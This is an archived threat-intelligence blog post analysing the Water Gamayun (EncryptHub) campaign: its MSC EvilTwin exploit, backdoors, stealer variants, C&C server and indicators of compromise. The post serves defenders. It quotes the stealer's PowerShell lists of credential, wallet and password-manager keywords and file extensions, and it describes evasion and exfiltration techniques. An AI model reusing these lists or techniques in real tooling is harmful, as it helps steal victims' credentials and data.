A Deep Dive into Water Gamayun's Arsenal and Infrastructure
Published: 2025-03-28 · Archived: 2026-04-02 11:58:10 UTC
Summary
Water Gamayun, which exploits the MSC EvilTwin zero-day vulnerability (CVE-2025-26633) to
compromise systems and exfiltrate data, uses custom payloads and data exfiltration techniques. Businesses
can be severely impacted by such an attack as a result of data theft and operational disruption.
The threat actor deploys payloads primarily by means of malicious provisioning packages, signed .msi
files, and Windows MSC files, using techniques like the IntelliJ runnerw.exe for command execution.
EncryptHub Stealer variants, and backdoors such as SilentPrism and DarkWisp, are also used to gain
persistence and steal data. These malware strains communicate with C&C servers for command execution
and data exfiltration, leveraging encrypted channels and anti-analysis techniques.
Organizations can protect themselves from threats like Water Gamayun through up-to-date patch
management and advanced threat detection technologies. Trend customers are protected from attempts to
exploit CVE-2025-26633 via Trend Vision One™ rules and filters.
Water Gamayun, a suspected Russian threat actor also known as EncryptHub and Larva-208, has been exploiting
the MSC EvilTwin (CVE-2025-26633), a zero-day vulnerability that was patched on March 11open on a new tab.
In the first installment of this two-part seriesopen on a new tab, Trend Research discussed in depth its discovery of
an Water Gamayun campaign exploiting this vulnerability. In this blog entry, we will cover the various delivery
methods, custom payloads and techniques used by Water Gamayun to compromise victim systems and exfiltrate
sensitive data.
The threat actor mainly delivers malicious payload through provisioning packages (.ppkg), signed Microsoft
Installer files (.msi) and Windows MSC files. We also identified a new living-off-the-land binary (LOLBin)
technique in which the attacker utilizes the IntelliJ process launcher runnerw.exeopen on a new tab file to proxy
the execution of PowerShell commands on an infected system.
This campaign, attributed to Water Gamayun, appears to be under active development. These payloads are
designed to maintain persistence and steal sensitive data and exfiltrate it to the attackers' command-and-control
(C&C) servers. In this research, we provide a detailed analysis of each malicious payload in this arsenal. Notably,
we gained access to the components and modules of the C&C servers, enabling a comprehensive analysis of their
architecture, functionality, and evasion techniques.
The following is the identified arsenal associated with the Water Gamayun. All the details of these modules are
covered in this blog post.
EncryptHub stealer
DarkWisp backdoor
SilentPrism backdoor
MSC EvilTwin loader
https://www.trendmicro.com/en_us/research/25/c/deep-dive-into-water-gamayun.html
Page 1 of 41

Stealc
Rhadamanthys stealer
In the following section, we will explore the history of EncryptHub and conduct an analysis of the associated
malware.
EncryptHub’s origins
On July 26, 2024, security researcher Germán Fernández tweetedopen on a new tab about a fake WinRAR website
distributing various types of malwares, including stealers, miners, hidden virtual network computing (hVNC), and
ransomware, as shown in Figure 1. These malicious tools were hosted on a GitHub repository named
"encrypthub," managed by a user called "sap3r-encrypthub" (Figure 2).
Figure 2. EncryptHub Github repository
Subsequently, on August 5, 2024, researchers published an analysisopen on a new tab detailing this attack vector,
shedding light on the malicious activity associated with this campaign. The GitHub repository was later taken
down, and its contents were relocated to the encrypthub.(net/org) domain. The attackers transitioned their
operations to this domain, utilizing it to both host the malware and manage their command-and-control (C&C)
server infrastructure.
At the time of our research, the encrypthub.(net/org) domain was no longer operational. During our investigation,
we identified a new and active domain hosted at 82[.]115[.]223[.]182. Usually, the server is active for a few days
before going down, and then a new one is deployed to replace it. We list these C&C servers in the Indicators of
Compromise (IOC) section at the end of this blog entry.
MSI malware distribution vector
https://www.trendmicro.com/en_us/research/25/c/deep-dive-into-water-gamayun.html
Page 2 of 41

Name
DingTalk_v7.6.38.122510801.msi
QQTalk.msi
VooV Meeting.msi
MD5
abaa46bc704842d6cc6f494c21546ae6
87792cf4bd370f483a293a23c4247c50
e59a025f9310d266190b91f5330fde8d
SHA-1
87c46845f57dc9ca8136b730c08b5b5916ca0ad3
a225bee48074feac53c7cb2f3929a41f7b4a71d3
ffb72adff6e099a9deb418c5d40abd8cf9b12c42
SHA-256
cbb84155467087c4da2ec411463e4af379582bb742ce7009156756482868859c
725df91a9db2e077203d78b8bef95b8cf093e7d0ee2e7a4f55a30fe200c3bf8f
db3fe436f4eeb9c20dc206af3dfdff8454460ad80ef4bab03291528e3e0754ad
Size
4.01 MB (4205056 bytes)
4.06 MB (4259328 bytes)
4.09 MB (4291584 bytes)
File type MSI
Table 1. MSI malware
The MSI (Microsoft Installer) file is designed to execute a PowerShell downloader, which downloads and runs the
next-stage payload on an infected system.
The threat actor is taking advantage of the Custom Action feature in the MSI package format to run the
PowerShell script.  The CustomAction table includes third-party libraries like aicustact.dll and
PowerShellScriptLauncher.dll, indicating that the MSI was likely created using the "Advanced Installer"
application. The malicious script is embedded in the AI_DATA_SETTER custom action within the
CustomActionData field (Figure 3). 
Figure 3. Malicious MSI custom action
AI_DATA_SETTER is a Type 51 custom action, which is used to dynamically set property values during the
installation process. The embedded script is executed by the PowerShellScriptInline custom action, which is
https://www.trendmicro.com/en_us/research/25/c/deep-dive-into-water-gamayun.html
Page 3 of 41

exported from the PowerShellScriptLauncher.dll library. This action retrieves the PowerShell code from the
CustomActionData field and executes it during runtime.
Figure 4. MSI execution flow
SilentPrism backdoor
Name worker.ps1
MD5 f0df469c3459a6a3b98b7b69b07bf61b
SHA-1 b38a0478aefa9d9d77282dd82ada51d7a47fe6f5
SHA-256 983506186590f7118cb507d29f12f163afb536a03e6d0f4fb441df8afe49ede1
Size 13241 bytes
File type PowerShell
Table 2. SilentPrism
SilentPrism is a backdoor malware designed to achieve persistence, dynamically execute shell commands, and
maintain unauthorized remote control of compromised systems (Figure 5). It implements persistence mechanisms
differently based on user privileges: for non-administrative users, it leverages the Windows registry to create auto-run entries using mshta.exe combined with VBScript to download and execute remote payloads; for administrative
users, it deploys scheduled tasks with similar execution methods. SilentPrism retrieves additional payloads and
instructions from a C&C server, ensuring modular functionality.
The malware communicates with its C&C server using encrypted channels, employing AES encryption and
Base64 encoding to obfuscate data. Commands received are decrypted and executed in various ways, including
direct PowerShell script execution, dynamic script block creation, or job-based execution. Each task is tracked
using unique identifiers, allowing the malware to monitor execution states and return results to the server.
https://www.trendmicro.com/en_us/research/25/c/deep-dive-into-water-gamayun.html
Page 4 of 41

SilentPrism incorporates anti-analysis techniques such as virtual machine detection and randomized sleep
intervals (ranging from 300 to 700 milliseconds) between operations, making its behavior less predictable.
Additionally, it continuously polls the C&C server for commands, enabling operators to dynamically control
infected systems. 
https://www.trendmicro.com/en_us/research/25/c/deep-dive-into-water-gamayun.html
Page 5 of 41

https://www.trendmicro.com/en_us/research/25/c/deep-dive-into-water-gamayun.html
Page 6 of 41

Figure 5. SilentPrism execution logic
In Figure 6, we show the network traffic generated by an infected system during its registration and data
exfiltration process. Figure 7 shows the decrypted data sent by the malware.
Figure 6. Exfiltrate encrypted collected information
Figure 7. Sample of the decrypted collected information
The script enters a polling cycle with randomized sleep intervals (300-700 milliseconds) where it transmits the
system’s Universally Unique Identifier (UUID) to a predefined endpoint. Upon receiving non-wait responses, the
script deserializes JSON payloads containing command instructions, implements job management logic to track
execution status, and utilizes PowerShell's scriptblock creation mechanism with Invoke-Expression (iex) to
execute arbitrary commands received from the C&C server.
https://www.trendmicro.com/en_us/research/25/c/deep-dive-into-water-gamayun.html
Page 7 of 41

The script leverages PowerShell's Start-Job functionality to run commands asynchronously, allowing the malware
to execute multiple commands simultaneously without blocking the main communication loop. Completed job
outputs are encrypted and transmitted back to the server. The code snippet in Figure 8 shows the SilentPrism
backdoor beaconing and command execution logic.
Figure 8. SilentPrism command execution logic
MSC EvilTwin loader
https://www.trendmicro.com/en_us/research/25/c/deep-dive-into-water-gamayun.html
Page 8 of 41

Name
miner.ps1
runner.ps1
MD5
239e8a3ee1fafe452d0b59eadb32247b
99a80820ae6dc60c9e9307e6ed8ef211
SHA-1
1377a69ae519d1cf000fa51869454e31ba92056d
2e4ae2af76c6239eb4191853221b4a40139cc122
SHA-256
0ac748baaad6017e331a8d99aae9e5449a96ba76fb7374f5d8c678ae52b7db9f
f381a3877028f29ec7865b505b5c85ce77d4947d387d3f30071159fa991f009a
Size
276 KB (282803 bytes)
276 KB (282808 bytes)
File type PowerShell
Table 3. MSC EvilTwin loader
The MSC EvilTwin loader (Figure 9) represents a novel approach (CVE-2025-26633) to malware deployment by
leveraging specially crafted Microsoft Saved Console (.msc) files. The MSC EvilTwin loader creates two
directories: C:\Windows \System32<space>\ and C:\Windows<space>\System32\en-US. These directories mimic
legitimate system paths to give credibility to the files placed within them. The loader contains two Base64-
encoded payloads, referred to as decodedBytesOriginal and decodedBytesFakes.
The decodedBytesOriginal variable contains a decoy XML configuration .msc file, while the decodedBytesFakes
variable contains a crafted .msc file with a placeholder {htmlLoaderUrl}. This placeholder is later replaced with
the URL https://82[.]115[.]223[.]182/encrypthub/ram/, which contains PowerShell commands.
The loader writes the decoy .msc file to C:\Windows \System32\WmiMgmt.msc and the malicious .msc file to
C:\Windows \System32\en-US\WmiMgmt.msc. The {htmlLoaderUrl} placeholder in the malicious file is replaced
dynamically with the specified URL (Figure 10).
The loader then executes the malicious .msc file using Start-Process. This execution downloads and runs a
PowerShell script from the specified URL to deliver the next-stage payload. Afterward, the loader introduces a 30-
second delay using the Start-Sleep command, likely to ensure successful execution and avoid detection.
Finally, the loader performs a cleanup operation by removing the created directories and files (C:\Windows
\System32\, C:\Windows \System32\en-US, and C:\Windows) to minimize forensic traces.
https://www.trendmicro.com/en_us/research/25/c/deep-dive-into-water-gamayun.html
Page 9 of 41

Figure 9. MSC EvilTwin loader main logic
Figure 10. Execute code hosted on C&C server via MMC.exe’s view object method
ExecuteShellCommand
In runner.ps1 (Table 3), the malware downloads and deploys the Rhadamanthys stealer onto an infected system.
The file ram.exe (SHA256: bad43a1c8ba1dacf3daf82bc30a0673f9bc2675ea6cdedd34624ffc933b959f4) serves as
the Rhadamanthys loader, which is responsible to install and activate the Rhadamanthys stealer on the
compromised machine.
https://www.trendmicro.com/en_us/research/25/c/deep-dive-into-water-gamayun.html
Page 10 of 41

DarkWisp backdoor analysis
Name Encrypt.ps1
MD5 42b55615cbaa014f246097bd904d7ff2
Sha256 d150d8d8bfa651c0e08a10323ecb0bccf346a35bd1bad19f89a5338acd8a88b3
SHA-1 f16e0dac597de903a4c6842184770ba5618275a0
Size 24.90 KB (25495 bytes)
File type PowerShell
Table 4. DarkWisp backdoor
To achieve persistence on infected systems, Water Gamayun employs two distinct backdoors in their campaigns.
In earlier campaigns with encrypthub[.]net/org, they utilized the SilentPrism backdoor, a tool designed for
stealthy access and control. In their latest campaign, we identified a new backdoor, which we have named
DarkWisp.
DarkWisp is a PowerShell-based backdoor and reconnaissance utility designed for unauthorized system access
and intelligence gathering (Table 4). It enables attackers to exfiltrate sensitive data while maintaining persistent
control over the compromised system. Figure 11 provides an overview of the core logic behind DarkWisp,
showcasing its structure and functionality. 
https://www.trendmicro.com/en_us/research/25/c/deep-dive-into-water-gamayun.html
Page 11 of 41

Figure 11. DarkWisp execution flow
The malware collects extensive information about the compromised system to create a detailed profile (Figure 12).
It determines whether the user has administrative privileges, checks for membership in a corporate domain, and
identifies the presence of cryptocurrency wallets or VPN software by scanning specified directories and
applications. It also gathers data about the system's operating environment, including public IP address,
geographic location, installed antivirus products, firewall status, and system uptime. This information is compiled
into a structured format and transmitted to the C&C server.
https://www.trendmicro.com/en_us/research/25/c/deep-dive-into-water-gamayun.html
Page 12 of 41

Figure 12. DarkWisp data exfiltration
https://www.trendmicro.com/en_us/research/25/c/deep-dive-into-water-gamayun.html
Page 13 of 41

The malware implements a dual-channel C&C communication strategy. The primary channel operates over TCP
port 8080, which is used for three purposes:
1. Sending initial system reconnaissance data (including computer name, user privileges, OS details,
cryptocurrency wallet presence, VPN status, and antivirus information)
2. Maintaining a persistent connection through a PING mechanism
3. Receiving Base64-encoded commands from the C&C server
The secondary channel operates over HTTPS port 8081 and serves as a redundant path specifically for exfiltrating
command execution results. When a command is executed, the output is sent through both the TCP connection on
port 8080, encoded as a Base64 string, and transmitted via HTTPS GET request to port 8081 using the endpoint
/receive_result. This dual-channel approach for command results ensures reliable delivery of command outputs
back to the C&C server, even if one channel becomes unavailable. Figure 13 shows the network traffic sent by the
malware over TCP on port 8080.
Figure 13. DarkWisp backdoor Network communication
Once the malware exfiltrates reconnaissance and system information to the C&C server, it enters a continuous
loop waiting for commands. The malware accepts commands through a TCP connection on port 8080, where
commands arrive in the format COMMAND|<base64_encoded_command>.
https://www.trendmicro.com/en_us/research/25/c/deep-dive-into-water-gamayun.html
Page 14 of 41

Figure 14. DarkWisp command execution
Each DarkWisp backdoor stub has a unique build identifier, which the C&C server uses upon establishing a
successful connection. The server then sends specific commands tailored to the corresponding build. In this case,
the build identifier is encrypthub (Figure 15), and the server issues a predefined command, whoami, encoded as
COMMAND|d2hvYW1p.
https://www.trendmicro.com/en_us/research/25/c/deep-dive-into-water-gamayun.html
Page 15 of 41

Figure 15. Payload build
In Figure 16 below, we show that this configuration is stored on the C&C server.
Figure 16. C&C server configuration
The malware decodes this Base64-encoded command and executes it using the Invoke-Expression cmdlet. The
output of the executed command is formatted as RESULT|<Command output> and sent back to the server. This
result is exfiltrated over TCP on port 8080, and optionally over HTTPS on port 8081, for redundancy and evasion
(Figure 17). The main communication loop ensures continuous interaction with the server, handling commands,
maintaining connectivity, and securely transmitting results.
https://www.trendmicro.com/en_us/research/25/c/deep-dive-into-water-gamayun.html
Page 16 of 41

Figure 17. Command execution result exfiltration
Figure 18. Execution debug message – Server issues a "whoami" command to the malware upon
establishing a connection
EncryptHub stealers
We have identified five information stealers in the Water Gamayun arsenal, including three custom PowerShell
payload and two known malware binaries: Stealc and Rhadamanthys Stealer.
https://www.trendmicro.com/en_us/research/25/c/deep-dive-into-water-gamayun.html
Page 17 of 41

In a campaign distributing malware via encrypthub[.]org/net, the custom PowerShell-based stealers used were
named stealer_module.ps1 and encrypthub_steal.ps1; we refer to it as EncryptHub Stealer variant A. The payloads
served in 82[.]115[.]223[.]182/payload, the info stealer was named fickle_payload.ps1; we refer to it as
EncryptHub Stealer variant B. In a more recent campaign, we identified another variant named payload.ps1; we
refer to it as EncryptHub Stealer variant C. These variants exhibit similar functionalities and capabilities, with
only minor modifications distinguishing them.
All EncryptHub variants covered in this research are modified versions of the open-source Kematian-Stealer. Also,
these variants are using the banner shown in Figure 19, unlike the original Kematian-Stealer developed by
“Somali-Devs”, which is no longer available on GitHub.
Figure 19. Encrypthub stealer’s banner
EncryptHub Stealer is distributed through malicious MSI packages or binary malware droppers such as skotes.exe
(SHA256: 079b7f03c727de92c3fcb7d3b9b9fea6d1e9ffdcd60dc9a360af90ce7b4b5cc6), WEXTRACT.EXE.MUI
(SHA256: 5752efa219c7e42cb104917f38c146e1f747d14230be0e64a5e87c20e82075bb), and axplong.exe
(SHA256: 2a5f9198f1e563688a2081b746bdaf48d897ec0ae96dfafc15cd5cd52c25e8f2). These droppers deploy
and execute various other stealers, including Lumma Stealer and Amadey. EncryptHub’s execution flow and
architecture is shown in Figure 20.
https://www.trendmicro.com/en_us/research/25/c/deep-dive-into-water-gamayun.html
Page 18 of 41

Figure 20. EncryptHub stealer - Execution flow and architecture
EncryptHub Stealer Variant A
Name
stealer_module.ps1
encrypthub_steal.ps1
MD5
2f8bf3e5b6cbdb0c8e5935b078711867
1fbe357c26133a4b39b96fdd2c48f1ae
SHA-1
Ca4fea2deacb9665461eb74b6422b137326c0d76
57ab6bdbb41289f3c8983d5b48fc98c08782ed1f
SHA-256
B29e630b9c70b0daaba4f83489494444c04c7a470b9c24eb4ddffb6cd7cf05ff
677601f72181c53541f850248dd0904153ea62458489d7aa782149b93399ebd8
Size
368111 bytes
371740 bytes)
File type PowerShell
Table 5. EncryptHub Stealer Variant A
https://www.trendmicro.com/en_us/research/25/c/deep-dive-into-water-gamayun.html
Page 19 of 41

Upon execution, the malware collects extensive system information, including antivirus software, installed
software, network adapters, running applications, and more. It also extracts sensitive data such as Wi-Fi
passwords, Windows product keys, clipboard history, and session data from various messaging clients, VPN
clients, VNC clients, FTP clients, and password managers. Additionally, it collects files from user directories
based on these specific keywords and extensions:
$keywords = @("2fa", "acc", "account", "auth", "backup", "bank", "binance", "bitcoin", "bitwarden", "btc",
"casino", "code", "coinbase ", "crypto", "dashlane", "discord", "eth", "exodus", "facebook", "funds", "info",
"keepass", "keys", "kraken", "kucoin", "lastpass", "ledger", "login", "mail", "memo", "metamask", "mnemonic",
"nordpass", "note", "pass", "passphrase", "proton", "paypal", "pgp", [...])
$allowedExtensions = @("*.jpg", "*.png", "*.rdp", "*.txt", "*.doc", "*.docx", "*.pdf", "*.csv", "*.xls", "*.xlsx",
"*.ldb", "*.log", "*.pem", "*.ppk", "*.key", "*.pfx")
The following Figure 21 illustrates how the malware fingerprints a victim machine.
Figure 21. EncryptHub Variant A - System information gathering
The malware then sends the collected system information to the attacker's C&C server (Figure 22), unlike
Kematian stealer, which used Discord for exfiltration, Figure 23 shows the HTTP request used to exfiltrate system
information.
https://www.trendmicro.com/en_us/research/25/c/deep-dive-into-water-gamayun.html
Page 20 of 41

Figure 22. Collection and exfiltration of system information
https://www.trendmicro.com/en_us/research/25/c/deep-dive-into-water-gamayun.html
Page 21 of 41

Figure 23. HTTP request used to exfiltrate system information
After transmitting the system information, the malware proceeds to initiate the stealing process. It gathers
additional data such as browser credentials, clipboard content, and other sensitive information. This data is then
compressed into a ZIP archive and uploaded to the attacker's C&C server (Figure 24). Figure 25 shows the HTTP
request used to exfiltrate the stolen data.
https://www.trendmicro.com/en_us/research/25/c/deep-dive-into-water-gamayun.html
Page 22 of 41

Figure 24. Achieving and exfiltrating collected data
https://www.trendmicro.com/en_us/research/25/c/deep-dive-into-water-gamayun.html
Page 23 of 41

Figure 25. HTTP request used to exfiltrate collected data
In this variant, we have identified the use of LOLBins technique (Figure 26), which attackers tend to utilize to
carry out malicious activities, blending their actions with normal system operations to evade detection.
In this case, the malware loads IntelliJ's runnerw.exe – renamed to invoker.exe (SHA256:
91aa7642a301ad6f46a6e466d89b601270aac64b7b6a5661436f7f9b5d804e89) – which is a Windows executable
that acts as a wrapper process for running and managing programs launched from IntelliJ IDEA.
The script ensures it runs with administrative privileges and, if successful, decodes and writes a payload to the
created C:\Windows<space>\System32 directory. It then uses powershell.exe to run the payload with hidden
execution and bypasses standard execution policies, downloading and executing a remote script. This technique
effectively evades detection by abusing the inherent trust in system binaries and directories, combining script
execution and network-based payload delivery to carry out its objectives stealthily.
https://www.trendmicro.com/en_us/research/25/c/deep-dive-into-water-gamayun.html
Page 24 of 41

Figure 26. LOLBins technique
Figure 27 below shows the execution of the PowerShell script using the renamed file invoker.exe, leveraging the
LOLBins technique.
Figure 27. PowerShell execution via LOLBins technique
EncryptHub Stealer Variant B
Name fickle_payload.ps1
MD5 3371da6397159dbced2794c12aeb80c6
SHA-1 291ed2eb864c95ba5495ca415efd1b071362ec7b
SHA-256 899d0b75e7eb3250246f709ad8aa32a8634f536153a3d2eaa3b5a9d9c2690168
Size 28490240 bytes
https://www.trendmicro.com/en_us/research/25/c/deep-dive-into-water-gamayun.html
Page 25 of 41

File type PowerShell
Table 6. EncryptHub Stealer Variant B
This stealer variant has been identified in a campaign hosted on the C&C server at 82[.]115[.]223[.]182. In Figure
28, we show the debug execution message of EncryptHub Variant B.
While there are code similarities between this version and the Kematian stealer, the malware author has made
significant modifications. They have removed some functions and introduced new capabilities: This includes
automated collection techniques and obfuscation methods like Base64 encoding to encode collected file name and
build type (Figure 29), the extraction of collected information to remote server over port 8081 (Figures 30 and
31), and the sending of notification messages to the attacker via Telegram (Figures 32 and 33). This stealer variant
is designed to collect data, like the previously mentioned stealers.
Figure 28. EncryptHub Variant B Stealer - Execution
Figure 29. EncryptHub Variant B collects system information
https://www.trendmicro.com/en_us/research/25/c/deep-dive-into-water-gamayun.html
Page 26 of 41

Figure 30. Constructing the HTTPS to upload the collected information
Figure 31. Extracting the collected information to the attacker
https://www.trendmicro.com/en_us/research/25/c/deep-dive-into-water-gamayun.html
Page 27 of 41

Figure 32. Constructing the Telegram notification request (associated HTTP request)
Figure 33. Telegram notification
https://www.trendmicro.com/en_us/research/25/c/deep-dive-into-water-gamayun.html
Page 28 of 41

EncryptHub Stealer Variant C
Name payload.ps1
MD5 1c34b88280d660051b69ccb40660e71f
SHA-1 d63a8c0a00fb1c68450da7cc19a08a6ed96791dc
SHA-256 49a552d3adbcad9f5ac70151b48a4edc2ae1d4094a1ea9d944785cee8b4319d7
Size 28504756 bytes
File type PowerShell
Table 7. EncryptHub Stealer Variant C
Variant C (Table 7) is the latest version of the script, introducing modifications that change how data is exfiltrated
to the C&C server (Figure 34). Notably, it removes Telegram-based data exfiltration, which has been replaced
with direct HTTPS exfiltration to a hardcoded attacker-controlled server, hxxps[:]//malwarehunterteam[.]net.
(There is no connection between this server and the similarly-named group of independent security researchers.)
This shift eliminates the reliance on third-party messaging services and allows the attacker to maintain full control
over stolen data. 
https://www.trendmicro.com/en_us/research/25/c/deep-dive-into-water-gamayun.html
Page 29 of 41

https://www.trendmicro.com/en_us/research/25/c/deep-dive-into-water-gamayun.html
Page 30 of 41

Figure 34. EncryptHub Stealer Variant C - Stolen data statistics creation logic
In Figure 35, we show how the malware transmits stolen data statistics to its C&C server. The traffic contains
multiple Base64-encoded parameters, which include the victim's system details and the count of stolen items, such
as passwords, cookies, cryptocurrency wallets, and messaging credentials. Each parameter is individually encoded
and appended to the query string after the /send_notification? endpoint, with the request being sent over port
8081. This variant’s stolen file exfiltration mechanism and other features are similar to those in Variant B.
Figure 35. EncryptHub Stealer Variant C - Stolen data statistics exfiltration
EncryptHub infrastructure
During our research, we identified new and active infrastructure utilized by EncryptHub, which has been under
development on 82[.]115.223[.]182. Its login page is seen in Figure 36. 
https://www.trendmicro.com/en_us/research/25/c/deep-dive-into-water-gamayun.html
Page 31 of 41

Figure 36. EncryptHub login page
Our investigation revealed that the threat actor leverages this domain to host a variety of malicious payloads
(Figure 37), including encrypted.ps1 and fickle_payload.ps1, as well as data collected from compromised
machines, and the server-side implementation of the C&C infrastructure. The file and directory tree structure used
in this campaign is shown in Figure 38.
Figure 37. EncryptHub payloads
https://www.trendmicro.com/en_us/research/25/c/deep-dive-into-water-gamayun.html
Page 32 of 41

Figure 38. EncryptHub C&C tree structure
Moreover, we discovered that the threat actor uses HTML pages that appear blank in the browser but contain
hidden JavaScript code when inspected. This concealed JavaScript is designed to download additional malicious
files, including backdoors such as DarkWisp, stealers like Stealc and Rhadamanthys, as well as AnyDesk
software, which is used for remote access.
Figure 39 illustrates the JavaScript code that was used to execute a PowerShell command, which in turn
downloads another PowerShell script responsible for downloading and executing AnyDesk.
https://www.trendmicro.com/en_us/research/25/c/deep-dive-into-water-gamayun.html
Page 33 of 41

Figure 39. Remote PowerShell execution via JavaScript within empty HTML to download AnyDesk
Furthermore, our investigation revealed that C&C server operates on the same server (Figure 40), specifically on
port 8081. We successfully obtained the C&C source code, configuration files, victim list, and additional relevant
data. 
Figure 40. Server-side C&C content
C&C server implementation
Name Handler.py
https://www.trendmicro.com/en_us/research/25/c/deep-dive-into-water-gamayun.html
Page 34 of 41

SHA-256 724aa4d5e3fb96be0a4a01a74324e7123d3281d7e3dce0f79ae717c5a7383ef1
Size 15504 bytes
File type Python
Table 8. handle.py script
The handle.py script (Table 8) functions as the server-side component of a C&C server for the DarkWisp
backdoor, facilitating management and communication with compromised client machines.
The primary server function initiates a multi-threaded TCP server that listens for incoming client connections on
designated HOST and PORT addresses (Figure 41). Leveraging the socket library, the server binds to its assigned
address and begins listening with a connection backlog set to 5. When a new client connection is accepted, a
dedicated thread is spawned to manage client interactions, ensuring that the server can handle multiple
connections simultaneously. Additionally, the server launches a Flask-based web server on port 8081 to manage
HTTP requests, along with a periodic ping function (Figure 42).
Figure 41. C&C main function
Figure 42. send_periodic_ping function
https://www.trendmicro.com/en_us/research/25/c/deep-dive-into-water-gamayun.html
Page 35 of 41

Upon establishing a successful connection with the client, the server can receive three distinct types of messages
prefixed with INFO|, COMMAND|, or PING (Figure 43). Upon receipt of client information, the server is
designed to automatically send a notification to the attacker via Telegram (Figure 44). Figure 45 demonstrates how
it sends a notification message with system information to the attacker via Telegram.
Figure 43. Handling client messages
Figure 44. Handling INFO messages from clients
https://www.trendmicro.com/en_us/research/25/c/deep-dive-into-water-gamayun.html
Page 36 of 41

Figure 45. Prepare the information to send a notification message to Telegram
Figure 46. Telegram notification function
Moreover, the malware author has the capability to send Base64-encoded remote commands to the victim's
machine (Figure 47). This technique aims to evade detection mechanisms by obfuscating the commands, while
ensuring the results are transmitted back to the attacker effectively.
https://www.trendmicro.com/en_us/research/25/c/deep-dive-into-water-gamayun.html
Page 37 of 41

Figure 47. Sending remote commands to the infected machine
Figure 48. Handling COMMAND messages from clients
Furthermore, we were able to obtain a comprehensive list of all infected machines (Figure 49). This was achieved
by accessing specific URLs provided by the server via /list_all_clients or /list_clients_by_build (Figure 50). These
endpoints facilitate the efficient retrieval of detailed information about compromised clients.
Figure 49. List of compromised machines from the C&C server
https://www.trendmicro.com/en_us/research/25/c/deep-dive-into-water-gamayun.html
Page 38 of 41

Figure 50. List_all_clients function
We were also able to locate the stored information from the compromised machines on the C&C server (Figure
51).
Figure 51. Information from the compromised machines
Conclusion
Water Gamayun’s use of various delivery methods and techniques in its campaign, such as provisioning malicious
payloads through signed Microsoft Installer files and leveraging LOLBins, highlights their adaptability in
compromising victims’ systems and data. Throughout this analysis, we have detailed the arsenal of tools utilized
by Water Gamayun, including custom backdoors like SilentPrism and DarkWisp, as well as information stealers
such as EncryptHub Stealer variants and known malware like Stealc and Rhadamanthys. Their intricately
designed payloads and C&C infrastructure enable the threat actor to maintain persistence, dynamically control
infected systems, and obfuscate their activities. By gaining access to the components and modules of their C&C
servers, we were able to conduct a comprehensive analysis of their architecture, functionality, and evasion
techniques.
It is essential for organizations to stay informed about such evolving threats and understand the importance of
advanced threat detection and robust cybersecurity measures. By keeping abreast of the latest threat intelligence
https://www.trendmicro.com/en_us/research/25/c/deep-dive-into-water-gamayun.html
Page 39 of 41

and adopting proactive defense strategies, organizations can better protect themselves against actors like Water
Gamayun and mitigate potential risks.
Proactive security with Trend Vision One™
Organizations can protect themselves from attacks such as those employed by this threat actor with Trend Vision
Oneopen on a new tab™products – the only AI-powered enterprise cybersecurity platform that centralizes cyber
risk exposure management, security operations, and robust layered protection. This comprehensive approach helps
you predict and prevent threats, accelerating proactive security outcomes across your entire digital estate. Backed
by decades of cybersecurity leadership and Trend Cybertron, the industry's first proactive cybersecurity AI, it
delivers proven results: a 92% reduction in ransomware risk and a 99% reduction in detection time. Security
leaders can benchmark their posture and showcase continuous improvement to stakeholders. With Trend Vision
One, you’re enabled to eliminate security blind spots, focus on what matters most, and elevate security into a
strategic partner for innovation.
Trend protections for CVE-2025-26633
The following protections have been available to Trend Micro customers: 
Trend Vision One™ - Network Security
TippingPoint Intrusion Prevention Filters
45359: TCP: Backdoor.Shell.DarkWisp.A Runtime Detection
45360: HTTP: Trojan.Shell.EncryptHubStealer.B Runtime Detection
45361: HTTP: Backdoor.Shell.SilentPrism.A Runtime Detection
45594: HTTP: Trojan.Shell.EncryptHubStealer.B Runtime Detection (Notification Request)
45595: HTTP: Trojan.Shell.MSCEvilTwin.A Runtime Detection (Payload - Server Response)
Hunting Queries 
Trend Vision One Search App
Trend Vision One customers can use the Search App to match or hunt the malicious indicators mentioned in this
blog post with data in their environment.   
Water Gamayun Malware Arsenal
malName: (*RHADAMANTHYS* OR *FICKLESHADE* OR *SILENTPRISM* OR *DARKWISP*) AND
eventName: MALWARE_DETECTION AND LogType: detection
EncryptHub Stealer Module execution
eventId:1 AND processFilePath:*powershell.exe AND processCmd:*encrypthub_steal.ps1
More hunting queries are available for Trend Vision One customers with Threat Insights Entitlement enabledopen
on a new tab.
https://www.trendmicro.com/en_us/research/25/c/deep-dive-into-water-gamayun.html
Page 40 of 41

Indicators of Compromise (IOCs)
The indicators of compromise for this entry can be found hereopen on a new tab.
Source: https://www.trendmicro.com/en_us/research/25/c/deep-dive-into-water-gamayun.html
https://www.trendmicro.com/en_us/research/25/c/deep-dive-into-water-gamayun.html
Page 41 of 41

 https://www.trendmicro.com/en_us/research/25/c/deep-dive-into-water-gamayun.html  
Figure 30. Constructing the HTTPS to upload the collected information
Figure 31. Extracting the collected information to the attacker
  Page 27 of 41